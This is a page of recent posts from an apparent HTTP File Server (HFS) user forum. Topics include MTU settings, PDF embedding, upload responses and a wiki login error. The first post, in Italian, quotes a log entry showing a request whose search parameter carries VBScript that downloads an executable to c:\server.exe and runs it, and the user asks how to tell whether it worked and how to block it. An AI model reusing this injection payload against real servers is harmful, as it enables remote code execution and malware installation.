Italiano / Probabile tentativo di eseguire comandi da remoto
« Last post by _KrustY_ on January 16, 2018, 12:02:41 PM »
uso da tempo HFS su un server dedicato con Windows server 2012
tengo sempre aggiornato HFS, ora ho la 2.3k
2 giorni fa ho trovato nel log questi comandi

Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET",",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}

Ho cercato il file server.exe in c: ma non c'è e non è nemmeno aperto come processo
Vorrei capire se questo tentativo di esecuzione del file è andato a buon fine e se è possibile bloccare qualsiasi richiesta di esecuzione di script o comandi shell

HFS ~ HTTP File Server / Re: List file office have security : document safer
« Last post by bmartino1 on January 12, 2018, 10:15:45 PM »
lolz, what in the world are you talking about?

are you trying to use hfs and do a file listing of ofice documents?
are you trying to have a document apear in a web page?

what do you maen hfs can\;t list file "office"

usualy you have to define the document your using as a text/html
by addind the file extention to a application

Set mime type example pdf:

so extenion would be: *.pdf
adn application (steream/html encoding): application/pdf

then disaply the file on the webpage via html coding example:
Code: [Select]
<iframe src="somepage.pdf"></iframe>
also info on PDF can be found here:
To use a pdf in a web browser you will need this software:

now for the html code:
a real folder with your "*.pdf" file in it
right mouse click "properties" the pdf folder > different templates tab

put this html code in:

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
<html xmlns="">
<meta name="generator" content="HTML Tidy for Linux (vers 25 March 2009), see" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>PDF SAMPLE</title>
<br />
<embed width="100%" height="700" name="plugin" Title="Resume" src="" type="application/pdf">
<br />

You will need to setup the pdf document to be view able in a web page:

Edit > Prefference > Documents > (make sure htis box is checed)! Save as optimizes for Fast Web View

File > save as > same file it enables the web code in the pdf...
now open
(assume you have adobe reader installed... the pdf is now displayed in the browser...)
Bug reports / Re: MTU and MSS size setting
« Last post by bmartino1 on January 12, 2018, 10:10:04 PM »
actual most networks and devices use mtu 1300-1500

1500 - standared router networks (class C)
1400 - game station
1300 - major ISP head ends(advance routing)

1400 is usual added via default router config for most "major manfactures"...

all of with is not handeld via the software/ HFS program. there ususal is a setting to change in your router config

a bunch of testing and other networking stuff is required to even atempt to find your netwroks good mtu/mss...
HFS ~ HTTP File Server / Re: HFS returning OK (200) to POST even when upload fails
« Last post by bmartino1 on January 12, 2018, 10:08:14 PM »
you will probaly have to add a html code macro to give you soem more info:

some thing like this as seen form link above...

Html form code :

Code: [Select]
  <form><!---Removed form submit url-->
            <input type="text" id="keyName" value="testValue">
            <!---Id attribute added to input field to be submitted--->
            <input type="button" onclick="myFunction()" value="Submit">
            <!---Input type is button NOT submit--->

Javascript code:

Code: [Select]
function myFunction(){
var dataValue = $("#keyName").val();
            type : 'POST',
            //remove the .php from results.php.php
            url : "http://externalsite.cpm/results.php",
            //Add the request header
            headers : {
                Authorization : 'Bearer ' + 'XXXXXXXXXXXXXXXXXXXXXXXXX'
            contentType : 'application/x-www-form-urlencoded',
            //Add form data
            data : {keyName : dataValue},
            success : function(response) {
            error : function(xhr, status, error) {
                var err = eval("(" + xhr.responseText + ")");
        }); //End of Ajax
}   // End of myFucntion


more info aon addind data to the header:


REJETO has already answered this on a previous form post:

Re: Posting to HFS using Wfetch tool (HTTP Post) not saving file to folder
« Reply #9 on: August 31, 2015, 09:51:08 AM »
POST is generic. HFS needs data to be sent as "multipart", in the POST. That's what the browser does.
See if you have such option on your side.
« Last Edit: August 31, 2015, 09:59:15 AM by rejetto »
Bug reports / MTU and MSS size setting
« Last post by arttim on January 05, 2018, 02:49:10 AM »
During Big data file download test by HFS server, It set as MTU 1512 / MSS 1460 defaultly.
But Most network system use MTU 1500 / MSS 1448.
So It cause fragmentation problem frequently.
Can you change default MTU to 1500 or add MTU/MSS option menu??
HFS ~ HTTP File Server / List file office have security : document safer
« Last post by kckmxv on January 01, 2018, 11:38:47 PM »
Hfs can not list file office have security : document safer

how to display it?

Thanks you vary much!
HFS ~ HTTP File Server / Re: hfs yealink phone contact update
« Last post by bmartino1 on December 30, 2017, 11:29:30 PM »
just to add some info here. I believe rejeto has helped the users main question here.

HFS is a http protocal and caould be used to uplad phone configs.

Yealink are like polocom hardware. a SIP protacal VOIP service phone

You can use HFS as a HTTP Provisiong server. this will have a sepcfice folder with a config file that points to a Sip server for VOIP Phone use

pdf for yealink setup provsining server

Contact generation and provision:

Other languages / Re: HFS Spanish Chile
« Last post by clyman on December 18, 2017, 12:55:39 PM »
Gracias Amigo
HFS ~ HTTP File Server / Re: Feature request: folder access by IP address
« Last post by LeoNeeson on December 11, 2017, 07:40:46 PM »
Hi rejetto, please check your Wiki, since it seems there is a problem with it because I can't login. It shows this error: "There seems to be a problem with your login session; this action has been cancelled as a precaution against session hijacking. Go back to the previous page, reload that page and then try again.". I've tried to login with another browser, but it shows the same error.

See the screenshot:

Searching on Google, here, here and here you can find a possible solution (it seems you have to change $wgMainCacheType = CACHE_ACCEL; to $wgMainCacheType = CACHE_NONE; or changing it to $wgSessionCacheType = CACHE_DB; in the cache settings file, located in LocalSettings.php)

HFS ~ HTTP File Server / Re: Feature request: folder access by IP address
« Last post by morituruz on December 11, 2017, 06:00:52 AM »
Thanks to the wiki engine nothing was actually deleted :)
